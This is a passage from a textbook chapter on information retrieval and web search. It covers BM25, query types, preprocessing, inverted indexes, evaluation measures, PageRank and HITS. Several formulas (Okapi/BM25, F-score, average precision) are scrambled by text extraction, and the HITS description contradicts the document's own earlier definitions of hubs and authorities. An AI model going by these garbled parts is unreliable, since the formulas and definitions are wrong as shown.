more relevant to the query vector. In the probabilistic model, a more concrete and
definitive approach is taken: ranking documents by their estimated probability of
relevance with respect to the query and the document. This is the basis of the
Probability Ranking Principle developed by Robertson:11

In the probabilistic framework, the IR system has to decide whether the documents
belong to the relevant set or the nonrelevant set for a query. To make this decision,
it is assumed that a predefined relevant set and nonrelevant set exist for the query,
and the task is to calculate the probability that the document belongs to the relevant
set and compare that with the probability that the document belongs to the nonrel-
evant set.

Given the document representation D of a document, estimating the relevance R
and nonrelevance NR of that document involves computation of conditional prob-
ability P(R|D) and P(NR|D). These conditional probabilities can be calculated using
Bayes’ Rule:12

P(R|D) = P(D|R) × P(R)/P(D)
P(NR|D) = P(D|NR) × P(NR)/P(D)

A document D is classified as relevant if P(R|D) > P(NR|D). Discarding the constant
P(D), this is equivalent to saying that a document is relevant if:

P(D|R) × P(R) > P(D|NR) × P(NR)

The likelihood ratio P(D|R)/P(D|NR) is used as a score to determine the likelihood
of the document with representation D belonging to the relevant set.

The term independence or Naïve Bayes assumption is used to estimate P(D|R) using
computation of P(ti|R) for term ti. The likelihood ratios P(D|R)/P(D|NR) of docu-
ments are used as a proxy for ranking based on the assumption that highly ranked
documents will have a high likelihood of belonging to the relevant set.13

11For a description of the Cheshire II system, see Robertson (1997).
12Bayes’ theorem is a standard technique for measuring likelihood; see Howson and Urbach (1993), for
example.
13Readers should refer to Croft et al. (2009) pages 246–247 for a detailed description.

1004

Introduction to Information Retrieval and Web Search

With some reasonable assumptions and estimates about the probabilistic model
along with extensions for incorporating query term weights and document term
weights in the model, a probabilistic ranking algorithm called BM25 (Best Match
25) is quite popular. This weighting scheme has evolved from several versions of the
Okapi14 system.

The Okapi weight for Document dj and query q is computed by the formula below.
Additional notations are as follows:

■ ti is a term.

■ fij is the raw frequency count of term ti in document dj.

■ fiq is the raw frequency count of term ti in query q.

■ N is the total number of documents in the collection.

■ dfi is the number of documents that contain the term ti.

■ dlj is the document length (in bytes) of dj.

■ avdl is the average document length of the collection.

The Okapi relevance score of a document dj for a query q is given by the equation
below, where k1 (between 1.0–2.0), b (usually 0.75) ,and k2 (between 1–1000) are
parameters:

2.4 Semantic Model
However sophisticated the above statistical models become, they can miss many rel-
evant documents because those models do not capture the complete meaning or
information need conveyed by a user’s query. In semantic models, the process of
matching documents to a given query is based on concept level and semantic
matching instead of index term (keyword) matching. This allows retrieval of rele-
vant documents that share meaningful associations with other documents in the
query result, even when these associations are not inherently observed or statisti-
cally captured.

Semantic approaches include different levels of analysis, such as morphological,
syntactic, and semantic analysis, to retrieve documents more effectively. In
morphological analysis, roots and affixes are analyzed to determine the parts of
speech (nouns, verbs, adjectives, and so on) of the words. Following morphological
analysis, syntactic analysis follows to parse and analyze complete phrases in docu-
ments. Finally, the semantic methods have to resolve word ambiguities and/or gen-
erate relevant synonyms based on the semantic relationships between levels of
structural entities in documents (words, paragraphs, pages, or entire documents).

okapi( , ) ln
.

.

)
d q

N df

df

k f

k

j
i

i

ij=
− +

+
×

( +10 5
0 5

1

1

1 −− + +

×
+

+
b b

dl

avdl
f

k f

k fj
ij

iq

iqt q
i



( )2

2

1

,,d
j

14City University of London Okapi System by Robertson, Walker, and Hancock-Beaulieu (1995).

1005

Introduction to Information Retrieval and Web Search

The development of a sophisticated semantic system requires complex knowledge
bases of semantic information as well as retrieval heuristics. These systems often
require techniques from artificial intelligence and expert systems. Knowledge bases
like Cyc15 and WordNet16 have been developed for use in knowledge-based IR sys-
tems based on semantic models. The Cyc knowledge base, for example, is a represen-
tation of a vast quantity of commonsense knowledge about assertions (over 2.5
million facts and rules) interrelating more than 155,000 concepts for reasoning
about the objects and events of everyday life. WordNet is an extensive thesaurus
(over 115,000 concepts) that is very popular and is used by many systems and is
under continuous development (see Section 4.3).

3 Types of Queries in IR Systems
Different keywords are associated with the document set during the process of
indexing. These keywords generally consist of words, phrases, and other characteri-
zations of documents such as date created, author names, and type of document.
They are used by an IR system to build an inverted index (see Section 5), which is
then consulted during the search. The queries formulated by users are compared to
the set of index keywords. Most IR systems also allow the use of Boolean and other
operators to build a complex query. The query language with these operators
enriches the expressiveness of a user’s information need.

3.1 Keyword Queries
Keyword-based queries are the simplest and most commonly used forms of IR
queries: the user just enters keyword combinations to retrieve documents. The
query keyword terms are implicitly connected by a logical AND operator. A query
such as ‘database concepts’ retrieves documents that contain both the words ‘data-
base’ and ‘concepts’ at the top of the retrieved results. In addition, most systems also
retrieve documents that contain only ‘database’ or only ‘concepts’ in their text. Some
systems remove most commonly occurring words (such as a, the, of, and so on,
called stopwords) as a preprocessing step before sending the filtered query key-
words to the IR engine. Most IR systems do not pay attention to the ordering of
these words in the query. All retrieval models provide support for keyword queries.

3.2 Boolean Queries
Some IR systems allow using the AND, OR, NOT, ( ), + , and – Boolean operators in
combinations of keyword formulations. AND requires that both terms be found.
OR lets either term be found. NOT means any record containing the second term
will be excluded. ‘( )’ means the Boolean operators can be nested using parentheses.
‘+’ is equivalent to AND, requiring the term; the ‘+’ should be placed directly in front

15See Lenat (1995).
16See Miller (1990) for a detailed description of WordNet.

1006

Introduction to Information Retrieval and Web Search

of the search term. ‘–’ is equivalent to AND NOT and means to exclude the term; the
‘–’ should be placed directly in front of the search term not wanted. Complex
Boolean queries can be built out of these operators and their combinations, and
they are evaluated according to the classical rules of Boolean algebra. No ranking is
possible, because a document either satisfies such a query (is “relevant”) or does not
satisfy it (is “nonrelevant”). A document is retrieved for a Boolean query if the
query is logically true as an exact match in the document. Users generally do not use
combinations of these complex Boolean operators, and IR systems support a
restricted version of these set operators. Boolean retrieval models can directly sup-
port different Boolean operator implementations for these kinds of queries.

3.3 Phrase Queries
When documents are represented using an inverted keyword index for searching,
the relative order of the terms in the document is lost. In order to perform exact
phrase retrieval, these phrases should be encoded in the inverted index or imple-
mented differently (with relative positions of word occurrences in documents). A
phrase query consists of a sequence of words that makes up a phrase. The phrase is
generally enclosed within double quotes. Each retrieved document must contain at
least one instance of the exact phrase. Phrase searching is a more restricted and spe-
cific version of proximity searching that we mention below. For example, a phrase
searching query could be ‘conceptual database design’. If phrases are indexed by the
retrieval model, any retrieval model can be used for these query types. A phrase the-
saurus may also be used in semantic models for fast dictionary searching for
phrases.

3.4 Proximity Queries
Proximity search refers to a search that accounts for how close within a record mul-
tiple terms should be to each other. The most commonly used proximity search
option is a phrase search that requires terms to be in the exact order. Other proxim-
ity operators can specify how close terms should be to each other. Some will also
specify the order of the search terms. Each search engine can define proximity oper-
ators differently, and the search engines use various operator names such as NEAR,
ADJ(adjacent), or AFTER. In some cases, a sequence of single words is given,
together with a maximum allowed distance between them. Vector space models that
also maintain information about positions and offsets of tokens (words) have
robust implementations for this query type. However, providing support for com-
plex proximity operators becomes computationally expensive because it requires
the time-consuming preprocessing of documents, and is thus suitable for smaller
document collections rather than for the Web.

3.5 Wildcard Queries
Wildcard searching is generally meant to support regular expressions and pattern
matching-based searching in text. In IR systems, certain kinds of wildcard search
support may be implemented—usually words with any trailing characters (for

1007

Introduction to Information Retrieval and Web Search

example, ‘data*’ would retrieve data, database, datapoint, dataset, and so on).
Providing support for wildcard searches in IR systems involves preprocessing over-
head and is not considered worth the cost by many Web search engines today.
Retrieval models do not directly provide support for this query type.

3.6 Natural Language Queries
There are a few natural language search engines that aim to understand the struc-
ture and meaning of queries written in natural language text, generally as a question
or narrative. This is an active area of research that employs techniques like shallow
semantic parsing of text, or query reformulations based on natural language under-
standing. The system tries to formulate answers for such queries from retrieved
results. Some search systems are starting to provide natural language interfaces to
provide answers to specific types of questions, such as definition and factoid ques-
tions, which ask for definitions of technical terms or common facts that can be
retrieved from specialized databases. Such questions are usually easier to answer
because there are strong linguistic patterns giving clues to specific types of sen-
tences—for example, ‘defined as’ or ‘refers to’. Semantic models can provide support
for this query type.

4 Text Preprocessing
In this section we review the commonly used text preprocessing techniques that are
part of the text processing task in Figure 1.

4.1 Stopword Removal
Stopwords are very commonly used words in a language that play a major role in
the formation of a sentence but which seldom contribute to the meaning of that
sentence. Words that are expected to occur in 80 percent or more of the documents
in a collection are typically referred to as stopwords, and they are rendered poten-
tially useless. Because of the commonness and function of these words, they do not
contribute much to the relevance of a document for a query search. Examples
include words such as the, of, to, a, and, in, said, for, that, was, on, he, is, with, at, by,
and it. These words are presented here with decreasing frequency of occurrence
from a large corpus of documents called AP89.17 The fist six of these words account
for 20 percent of all words in the listing, and the most frequent 50 words account for
40 percent of all text.

Removal of stopwords from a document must be performed before indexing.
Articles, prepositions, conjunctions, and some pronouns are generally classified as
stopwords. Queries must also be preprocessed for stopword removal before the
actual retrieval process. Removal of stopwords results in elimination of possible
spurious indexes, thereby reducing the size of an index structure by about 40

17For details, see Croft et al. (2009), pages 75–90.

1008

Introduction to Information Retrieval and Web Search

percent or more. However, doing so could impact the recall if the stopword is an
integral part of a query (for example, a search for the phrase ‘To be or not to be,’
where removal of stopwords makes the query inappropriate, as all the words in the
phrase are stopwords). Many search engines do not employ query stopword
removal for this reason.

4.2 Stemming
A stem of a word is defined as the word obtained after trimming the suffix and pre-
fix of an original word. For example, ‘comput’ is the stem word for computer, com-
puting, and computation. These suffixes and prefixes are very common in the
English language for supporting the notion of verbs, tenses, and plural forms.
Stemming reduces the different forms of the word formed by inflection (due to plu-
rals or tenses) and derivation to a common stem.

A stemming algorithm can be applied to reduce any word to its stem. In English, the
most famous stemming algorithm is Martin Porter’s stemming algorithm. The
Porter stemmer18 is a simplified version of Lovin’s technique that uses a reduced set
of about 60 rules (from 260 suffix patterns in Lovin’s technique) and organizes
them into sets; conflicts within one subset of rules are resolved before going on to
the next. Using stemming for preprocessing data results in a decrease in the size of
the indexing structure and an increase in recall, possibly at the cost of precision.

4.3 Utilizing a Thesaurus
A thesaurus comprises a precompiled list of important concepts and the main word
that describes each concept for a particular domain of knowledge. For each concept
in this list, a set of synonyms and related words is also compiled.19 Thus, a synonym
can be converted to its matching concept during preprocessing. This preprocessing
step assists in providing a standard vocabulary for indexing and searching. Usage of
a thesaurus, also known as a collection of synonyms, has a substantial impact on the
recall of information systems. This process can be complicated because many words
have different meanings in different contexts.

UMLS20 is a large biomedical thesaurus of millions of concepts (called the
Metathesaurus) and a semantic network of meta concepts and relationships that
organize the Metathesaurus (see Figure 3). The concepts are assigned labels from
the semantic network. This thesaurus of concepts contains synonyms of medical
terms, hierarchies of broader and narrower terms, and other relationships among
words and concepts that make it a very extensive resource for information retrieval
of documents in the medical domain. Figure 3 illustrates part of the UMLS
Semantic Network.

18See Porter (1980).
19See Baeza-Yates and Ribeiro-Neto (1999).
20Unified Medical Language System from the National Library of Medicine.

1009

Introduction to Information Retrieval and Web Search

Organ or
Tissue

Function

Physiologic
Function

Biologic
Function

Pathologic
Function

Organism
Function

Cell
Function

Molecular
Function

Cell or
Molecular

Dysfunction

Disease
or

Syndrome

Experimental
Model of
Disease

Mental or
Behavioral

Dysfunction

Neoplastic
Process

Mental
Process

Genetic
Function

Figure 3
A Portion of the UMLS Semantic Network: “Biologic Function” Hierarchy

Source: UMLS Reference Manual, National Library of Medicine.

WordNet21 is a manually constructed thesaurus that groups words into strict syn-
onym sets called synsets. These synsets are divided into noun, verb, adjective, and
adverb categories. Within each category, these synsets are linked together by appro-
priate relationships such as class/subclass or “is-a” relationships for nouns.

WordNet is based on the idea of using a controlled vocabulary for indexing, thereby
eliminating redundancies. It is also useful in providing assistance to users with
locating terms for proper query formulation.

4.4 Other Preprocessing Steps: Digits, Hyphens, Punctuation
Marks, Cases

Digits, dates, phone numbers, e-mail addresses, URLs, and other standard types of
text may or may not be removed during preprocessing. Web search engines,
however, index them in order to to use this type of information in the document

21See Fellbaum (1998) for a detailed description of WordNet.

1010

Introduction to Information Retrieval and Web Search

metadata to improve precision and recall (see Section 6 for detailed definitions of
precision and recall).

Hyphens and punctuation marks may be handled in different ways. Either the entire
phrase with the hyphens/punctuation marks may be used, or they may be elimi-
nated. In some systems, the character representing the hyphen/punctuation mark
may be removed, or may be replaced with a space. Different information retrieval
systems follow different rules of processing. Handling hyphens automatically can be
complex: it can either be done as a classification problem, or more commonly by
some heuristic rules.

Most information retrieval systems perform case-insensitive search, converting all
the letters of the text to uppercase or lowercase. It is also worth noting that many of
these text preprocessing steps are language specific, such as involving accents and
diacritics and the idiosyncrasies that are associated with a particular language.

4.5 Information Extraction
Information extraction (IE) is a generic term used for extracting structured con-
tent from text. Text analytic tasks such as identifying noun phrases, facts, events,
people, places, and relationships are examples of IE tasks. These tasks are also called
named entity recognition tasks and use rule-based approaches with either a the-
saurus, regular expressions and grammars, or probabilistic approaches. For IR and
search applications, IE technologies are mostly used to identify contextually rele-
vant features that involve text analysis, matching, and categorization for improving
the relevance of search systems. Language technologies using part-of-speech tagging
are applied to semantically annotate the documents with extracted features to aid
search relevance.

5 Inverted Indexing
The simplest way to search for occurrences of query terms in text collections can be
performed by sequentially scanning the text. This kind of online searching is only
appropriate when text collections are quite small. Most information retrieval sys-
tems process the text collections to create indexes and operate upon the inverted
index data structure (refer to the indexing task in Figure 1). An inverted index struc-
ture comprises vocabulary and document information. Vocabulary is a set of dis-
tinct query terms in the document set. Each term in a vocabulary set has an
associated collection of information about the documents that contain the term,
such as document id, occurrence count, and offsets within the document where the
term occurs. The simplest form of vocabulary terms consists of words or individual
tokens of the documents. In some cases, these vocabulary terms also consist of
phrases, n-grams, entities, links, names, dates, or manually assigned descriptor
terms from documents and/or Web pages. For each term in the vocabulary, the cor-
responding document ids, occurrence locations of the term in each document,
number of occurrences of the term in each document, and other relevant informa-
tion may be stored in the document information section.

1011

Introduction to Information Retrieval and Web Search

Weights are assigned to document terms to represent an estimate of the usefulness
of the given term as a descriptor for distinguishing the given document from other
documents in the same collection. A term may be a better descriptor of one docu-
ment than of another by the weighting process (see Section 2).

An inverted index of a document collection is a data structure that attaches distinct
terms with a list of all documents that contains the term. The process of inverted
index construction involves the extraction and processing steps shown in Figure 2.
Acquired text is first preprocessed and the documents are represented with the
vocabulary terms. Documents’ statistics are collected in document lookup tables.
Statistics generally include counts of vocabulary terms in individual documents as
well as different collections, their positions of occurrence within the documents,
and the lengths of the documents. The vocabulary terms are weighted at indexing
time according to different criteria for collections. For example, in some cases terms
in the titles of the documents may be weighted more heavily than terms that occur
in other parts of the documents.

One of the most popular weighting schemes is the TF-IDF (term frequency-inverse
document frequency) metric that we described in Section 2. For a given term this
weighting scheme distinguishes to some extent the documents in which the term
occurs more often from those in which the term occurs very little or never. These
weights are normalized to account for varying document lengths, further ensuring
that longer documents with proportionately more occurrences of a word are not
favored for retrieval over shorter documents with proportionately fewer occur-
rences. These processed document-term streams (matrices) are then inverted into
term-document streams (matrices) for further IR steps.

Figure 4 shows an illustration of term-document-position vectors for the four illus-
trative terms—example, inverted, index, and market—which refer to the three docu-
ments and the position where they occur in those documents.

The different steps involved in inverted index construction can be summarized as
follows:

1. Break the documents into vocabulary terms by tokenizing, cleansing,
stopword removal, stemming, and/or use of an additional thesaurus as
vocabulary.

2. Collect document statistics and store the statistics in a document lookup
table.

3. Invert the document-term stream into a term-document stream along with
additional information such as term frequencies, term positions, and term
weights.

Searching for relevant documents from the inverted index, given a set of query
terms, is generally a three-step process.

1. Vocabulary search. If the query comprises multiple terms, they are sepa-
rated and treated as independent terms. Each term is searched in the vocab-
ulary. Various data structures, like variations of B+-tree or hashing, may be

1012

This example
shows an
example of an
inverted index.

Inverted index
is a data
structure for
associating
terms to
documents.

Stock market
index is used
for capturing
the sentiments
of the financial
market.

Stock market
index is used
for capturing
the sentiments
of the financial
market.

ID

1.

2.

3.

4.

Term

example

inverted

index

market

Document: position

1:2, 1:5

1:8, 2:1

1:9, 2:2, 3:3

3:2, 3:13

Document 1

Document 2

Document 2

Introduction to Information Retrieval and Web Search

used to optimize the search process. Query terms may also be ordered in lex-
icographic order to improve space efficiency.

2. Document information retrieval. The document information for each term
is retrieved.

3. Manipulation of retrieved information. The document information vector
for each term obtained in step 2 is now processed further to incorporate var-
ious forms of query logic. Various kinds of queries like prefix, range, context,
and proximity queries are processed in this step to construct the final result
based on the document collections returned in step 2.

6 Evaluation Measures
of Search Relevance

Without proper evaluation techniques, one cannot compare and measure the rele-
vance of different retrieval models and IR systems in order to make improvements.

Figure 4
Example of an
inverted index.

1013

Introduction to Information Retrieval and Web Search

Evaluation techniques of IR systems measure the topical relevance and user
relevance. Topical relevance measures the extent to which the topic of a result
matches the topic of the query. Mapping one’s information need with “perfect”
queries is a cognitive task, and many users are not able to effectively form queries
that would retrieve results more suited to their information need. Also, since a
major chunk of user queries are informational in nature, there is no fixed set of
right answers to show to the user. User relevance is a term used to describe the
“goodness” of a retrieved result with regard to the user’s information need. User rel-
evance includes other implicit factors, such as user perception, context, timeliness,
the user’s environment, and current task needs. Evaluating user relevance may also
involve subjective analysis and study of user retrieval tasks to capture some of the
properties of implicit factors involved in accounting for users’ bias for judging
performance.

In Web information retrieval, no binary classification decision is made on whether a
document is relevant or nonrelevant to a query (whereas the Boolean (or binary)
retrieval model uses this scheme, as we discussed in Section 2.1). Instead, a ranking
of the documents is produced for the user. Therefore, some evaluation measures
focus on comparing different rankings produced by IR systems. We discuss some of
these measures next.

6.1 Recall and Precision
Recall and precision metrics are based on the binary relevance assumption (whether
each document is relevant or nonrelevant to the query). Recall is defined as the
number of relevant documents retrieved by a search divided by the total number of
existing relevant documents. Precision is defined as the number of relevant docu-
ments retrieved by a search divided by the total number of documents retrieved by
that search. Figure 5 is a pictorial representation of the terms retrieved vs. relevant
and shows how search results relate to four different sets of documents.

Relevant?

Yes No

Hits

TP

False
Alarms

FP

Misses

FN

Correct
Rejections

TN

Retrieved?

Yes

No

Figure 5
Retrieved vs. relevant
search results.

1014

Introduction to Information Retrieval and Web Search

Table 2 Precision and Recall for Ranked Retrieval

Doc. No. Rank Position i Relevant Precision(i) Recall(i)

10 1 Yes 1/1 = 100% 1/10 = 10%
2 2 Yes 2/2 = 100% 2/10 = 20%
3 3 Yes 3/3 = 100% 3/10 = 30%
5 4 No 3/4 = 75% 3/10 = 30%

17 5 No 3/5 = 60% 3/10 = 30%
34 6 No 3/6 = 50% 3/10 = 30%

215 7 Yes 4/7 = 57.1% 4/10 = 40%
33 8 Yes 5/8 = 62.5% 5/10 = 50%
45 9 No 5/9 = 55.5% 5/10 = 50%
16 10 Yes 6/10 = 60% 6/10 = 60%

The notation for Figure 5 is as follows:

■ TP: true positive

■ FP: false positive

■ FN: false negative

■ TN: true negative

The terms true positive, false positive, false negative, and true negative are generally
used in any type of classification tasks to compare the given classification of an item
with the desired correct classification. Using the term hits for the documents that
truly or “correctly” match the user request, we can define:

Recall = |Hits|/|Relevant|

Precision = |Hits|/|Retrieved|

Recall and precision can also be defined in a ranked retrieval setting. The Recall at
rank position i for document di

q (denoted by r(i)) (di
q is the retrieved document at

position i for query q) is the fraction of relevant documents from d1
q to di

q in the
result set for the query. Let the set of relevant documents from d1

q to di
q in that set

be Si with cardinality | Si |. Let (|Dq| be the size of relevant documents for the query.
In this case,|Si | ≤ |Dq|). Then:

Recall r(i) = |Si |/|Dq|

The Precision at rank position i or document di
q (denoted by p(i)) is the fraction of

documents from d1
q to di

q in the result set that are relevant:

Precision p(i) = |Si |/i

Table 2 illustrates the p(i), r(i), and average precision (discussed in the next
section) metrics. It can be seen that recall can be increased by presenting more
results to the user, but this approach runs the risk of decreasing the precision. In the

1015

Introduction to Information Retrieval and Web Search

example, the number of relevant documents for some query = 10. The rank posi-
tion and the relevance of an individual document are shown. The precision and
recall value can be computed at each position within the ranked list as shown in the
last two columns.

6.2 Average Precision
Average precision is computed based on the precision at each relevant document in
the ranking. This measure is useful for computing a single precision value to com-
pare different retrieval algorithms on a query q.

Consider the sample precision values of relevant documents in Table 2. The average
precision (Pavg value) for the example in Table 2 is P(1) + P(2) + P(3) + P(7) + P(8)
+ P(10)/6 = 79.93 percent (only relevant documents are considered in this calcula-
tion). Many good algorithms tend to have high top-k average precision for small
values of k, with correspondingly low values of recall.

6.3 Recall/Precision Curve
A recall/precision curve can be drawn based on the recall and precision values at
each rank position, where the x-axis is the recall and the y-axis is the precision.
Instead of using the precision and recall at each rank position, the curve is com-
monly plotted using recall levels r(i) at 0 percent, 10 percent, 20 percent…100 per-
cent. The curve usually has a negative slope, reflecting the inverse relationship
between precision and recall.

6.4 F-Score
F-score (F) is the harmonic mean of the precision (p) and recall (r) values. High
precision is achieved almost always at the expense of recall and vice versa. It is a
matter of the application’s context whether to tune the system for high precision or
high recall. F-score is a single measure that combines precision and recall to com-
pare different result sets:

One of the properties of harmonic mean is that the harmonic mean of two numbers
tends to be closer to the smaller of the two. Thus F is automatically biased toward
the smaller of the precision and recall values. Therefore, for a high F-score, both
precision and recall must be high.

F

p r

=
+

2
1 1

F
pr

p r
=

+
2

P p i D
d D q

i

q

q
avg = ∈∑ ( ) | |

1016

Introduction to Information Retrieval and Web Search

7 Web Search and Analysis22

The emergence of the Web has brought millions of users to search for information,
which is stored in a very large number of active sites. To make this information acces-
sible, search engines such as Google and Yahoo! have to crawl and index these sites
and document collections in their index databases. Moreover, search engines have to
regularly update their indexes given the dynamic nature of the Web as new Web sites
are created and current ones are updated or deleted. Since there are many millions of
pages available on the Web on different topics, search engines have to apply many
sophisticated techniques such as link analysis to identify the importance of pages.

There are other types of search engines besides the ones that regularly crawl the Web
and create automatic indexes: these are human-powered, vertical search engines or
metasearch engines. These search engines are developed with the help of computer-
assisted systems to aid the curators with the process of assigning indexes. They con-
sist of manually created specialized Web directories that are hierarchically organized
indexes to guide user navigation to different resources on the Web. Vertical search
engines are customized topic-specific search engines that crawl and index a specific
collection of documents on the Web and provide search results from that specific
collection. Metasearch engines are built on top of search engines: they query differ-
ent search engines simultaneously and aggregate and provide search results from
these sources.

Another source of searchable Web documents is digital libraries. Digital libraries
can be broadly defined as collections of electronic resources and services for the
delivery of materials in a variety of formats. These collections may include a univer-
sity’s library catalog, catalogs from a group of participating universities as in the
State of Florida University System, or a compilation of multiple external resources
on the World Wide Web such as Google Scholar or the IEEE/ACM index. These
interfaces provide universal access to different types of content—such as books,
articles, audio, and video—situated in different database systems and remote repos-
itories. Similar to real libraries, these digital collections are maintained via a catalog
and organized in categories for online reference. Digital libraries “include personal,
distributed, and centralized collections such as online public access catalogs
(OPACs) and bibliographic databases, distributed document databases, scholarly
and professional discussion lists and electronic journals, other online databases,
forums, and bulletin boards.” 23

7.1 Web Analysis and Its Relationship
to Information Retrieval

In addition to browsing and searching the Web, another important activity closely
related to information retrieval is to analyze or mine information on the Web for

22The contributions of Pranesh P. Ranganathan and Hari P. Kumar to this section is appreciated.
23Covi and Kling (1996), page 672.

1017

Introduction to Information Retrieval and Web Search

new information of interest. Application of data analysis techniques for discovery
and analysis of useful information from the Web is known as Web analysis. Over
the past few years the World Wide Web has emerged as an important repository of
information for many day-to-day applications for individual consumers, as well as a
significant platform for e-commerce and for social networking. These properties
make it an interesting target for data analysis applications. The Web mining and
analysis field is an integration of a wide range of fields spanning information
retrieval, text analysis, natural language processing, data mining, machine learning,
and statistical analysis.

The goals of Web analysis are to improve and personalize search results relevance
and to identify trends that may be of value to various businesses and organizations.
We elaborate on these goals next.

■ Finding relevant information. People usually search for specific informa-
tion on the Web by entering keywords in a search engine or browsing infor-
mation portals and using services. Search services are constrained by search
relevance problems since they have to map and approximate the information
need of millions of users as an a priori task. Low precision (see Section 6)
ensues due to results that are nonrelevant to the user. In the case of the Web,
high recall (see section 6) is impossible to determine due to the inability to
index all the pages on the Web. Also, measuring recall does not make sense
since the user is concerned with only the top few documents. The most rele-
vant feedback for the user is typically from only the top few results.

■ Personalization of the information. Different people have different content
and presentation preferences. By collecting personal information and then
generating user-specific dynamic Web pages, the pages are personalized for
the user. The customization tools used in various Web-based applications
and services, such as click-through monitoring, eyeball tracking, explicit or
implicit user profile learning, and dynamic service composition using Web
APIs, are used for service adaptation and personalization. A personalization
engine typically has algorithms that make use of the user’s personalization
information—collected by various tools—to generate user-specific search
results.

■ Finding information of commercial value. This problem deals with finding
interesting patterns in users’ interests, behaviors, and their use of products
and services, which may be of commercial value. For example, businesses
such as the automobile industry, clothing, shoes, and cosmetics may improve
their services by identifying patterns such as usage trends and user prefer-
ences using various Web analysis techniques.

Based on the above goals, we can classify Web analysis into three categories: Web
content analysis, which deals with extracting useful information/knowledge from
Web page contents; Web structure analysis, which discovers knowledge from
hyperlinks representing the structure of the Web; and Web usage analysis, which
mines user access patterns from usage logs that record the activity of every user.

1018

Introduction to Information Retrieval and Web Search

7.2 Searching the Web
The World Wide Web is a huge corpus of information, but locating resources that
are both high quality and relevant to the needs of the user is very difficult. The set of
Web pages taken as a whole has almost no unifying structure, with variability in
authoring style and content, thereby making it more difficult to precisely locate
needed information. Index-based search engines have been one of the prime tools
by which users search for information on the Web. Web search engines crawl the
Web and create an index to the Web for searching purposes. When a user specifies
his need for information by supplying keywords, these Web search engines query
their repository of indexes and produce links or URLs with abbreviated content as
search results. There may be thousands of pages relevant to a particular query. A
problem arises when only a few most relevant results are to be returned to the user.
The discussion we had about querying and relevance-based ranking in IR systems in
Sections 2 and 3 is applicable to Web search engines. These ranking algorithms
explore the link structure of the Web.

Web pages, unlike standard text collections, contain connections to other Web pages
or documents (via the use of hyperlinks), allowing users to browse from page to
page. A hyperlink has two components: a destination page and an anchor text
describing the link. For example, a person can link to the Yahoo! Website on his Web
page with anchor text such as “My favorite Website.” Anchor texts can be thought of
as being implicit endorsements. They provide very important latent human annota-
tion. A person linking to other Web pages from his Web page is assumed to have
some relation to those Web pages. Web search engines aim to distill results per their
relevance and authority. There are many redundant hyperlinks, like the links to the
homepage on every Web page of the Web site. Such hyperlinks must be eliminated
from the search results by the search engines.

A hub is a Web page or a Website that links to a collection of prominent sites
(authorities) on a common topic. A good authority is a page that is pointed to by
many good hubs, while a good hub is a page that points to many good authorities.
These ideas are used by the HITS ranking algorithm, which is described in Section
7.3. It is often found that authoritative pages are not very self-descriptive, and
authorities on broad topics seldom link directly to one another. These properties of
hyperlinks are being actively used to improve Web search engine result ranking and
organize the results as hubs and authorities. We briefly discuss a couple of ranking
algorithms below.

7.3 Analyzing the Link Structure of Web Pages
The goal of Web structure analysis is to generate structural summary about the
Website and Web pages. It focuses on the inner structure of documents and deals
with the link structure using hyperlinks at the interdocument level. The structure
and content of Web pages are often combined for information retrieval by Web
search engines. Given a collection of interconnected Web documents, interesting
and informative facts describing their connectivity in the Web subset can be discov-
ered. Web structure analysis is also used to reveal the structure of Web pages, which

1019

Introduction to Information Retrieval and Web Search

helps with navigation and makes it possible to compare/integrate Web page
schemes. This aspect of Web structure analysis facilitates Web document classifica-
tion and clustering on the basis of structure.

The PageRank Ranking Algorithm. As discussed earlier, ranking algorithms are
used to order search results based on relevance and authority. Google uses the well-
known PageRank algorithm,24 which is based on the “importance” of each page.
Every Web page has a number of forward links (out-edges) and backlinks (in-
edges). It is very difficult to determine all the backlinks of a Web page, while it is rel-
atively straightforward to determine its forward links. According to the PageRank
algorithm, highly linked pages are more important (have greater authority) than
pages with fewer links. However, not all backlinks are important. A backlink to a
page from a credible source is more important than a link from some arbitrary
page. Thus a page has a high rank if the sum of the ranks of its backlinks is high.
PageRank was an attempt to see how good an approximation to the “importance” of
a page can be obtained from the link structure.

The computation of page ranking follows an iterative approach. PageRank of a Web
page is calculated as a sum of the PageRanks of all its backlinks. PageRank treats the
Web like a Markov model. An imaginary Web surfer visits an infinite string of pages
by clicking randomly. The PageRank of a page is an estimate of how often the surfer
winds up at a particular page. PageRank is a measure of query-independent impor-
tance of a page/node. For example, let P(X) be the PageRank of any page X and C(X)
be the number of outgoing links from page X, and let d be the damping factor in the
range 0 < d < 1. Usually d is set to 0.85. Then PageRank for a page A can be calcu- lated as: P(A) = (1 – d) + d (P(T1)/C(T1) + ... + P(Tn)/C(Tn)) Here T1, T2, ..., Tn are the pages that point to Page A (that is, are citations to page A). PageRank forms a probability distribution over Web pages, so the sum of all Web pages’ PageRanks is one. The HITS Ranking Algorithm. The HITS25 algorithm proposed by Jon Kleinberg is another type of ranking algorithm exploiting the link structure of the Web. The algorithm presumes that a good hub is a document that points to many hubs, and a good authority is a document that is pointed at by many other author- ities. The algorithm contains two main steps: a sampling component and a weight- propagation component. The sampling component constructs a focused collection S of pages with the following properties: 1. S is relatively small. 2. S is rich in relevant pages. 3. S contains most (or a majority) of the strongest authorities. 24The PageRank algorithm was proposed by Lawrence Page (1998) and Sergey Brin, founders of Google. For more information, see http://en.wikipedia.org/wiki/PageRank. 25See Kleinberg (1999). 1020 Introduction to Information Retrieval and Web Search The weight component recursively calculates the hub and authority values for each document as follows: 1. Initialize hub and authority values for all pages in S by setting them to 1. 2. While (hub and authority values do not converge): a. For each page in S, calculate authority value = Sum of hub values of all pages pointing to the current page. b. For each page in S, calculate hub value = Sum of authority values of all pages pointed at by the current page. c. Normalize hub and authority values such that sum of all hub values in S equals 1 and the sum of all authority values in S equals 1. 7.4 Web Content Analysis As mentioned earlier, Web content analysis refers to the process of discovering use- ful information from Web content/data/documents. The Web content data consists of unstructured data such as free text from electronically stored documents, semi- structured data typically found as HTML documents with embedded image data, and more structured data such as tabular data, and pages in HTML, XML, or other markup languages generated as output from databases. More generally, the term Web content refers to any real data in the Web page that is intended for the user accessing that page. This usually consists of but is not limited to text and graphics. We will first discuss some preliminary Web content analysis tasks and then look at the traditional analysis tasks of Web page classification and clustering later. Structured Data Extraction. Structured data on the Web is often very important as it represents essential information, such as a structured table showing the airline flight schedule between two cities. There are several approaches to structured data extraction. One includes writing a wrapper, or a program that looks for different structural characteristics of the information on the page and extracts the right con- tent. Another approach is to manually write an extraction program for each Website based on observed format patterns of the site, which is very labor intensive and time consuming. It does not scale to a large number of sites. A third approach is wrapper induction or wrapper learning, where the user first manually labels a set of train- ing set pages, and 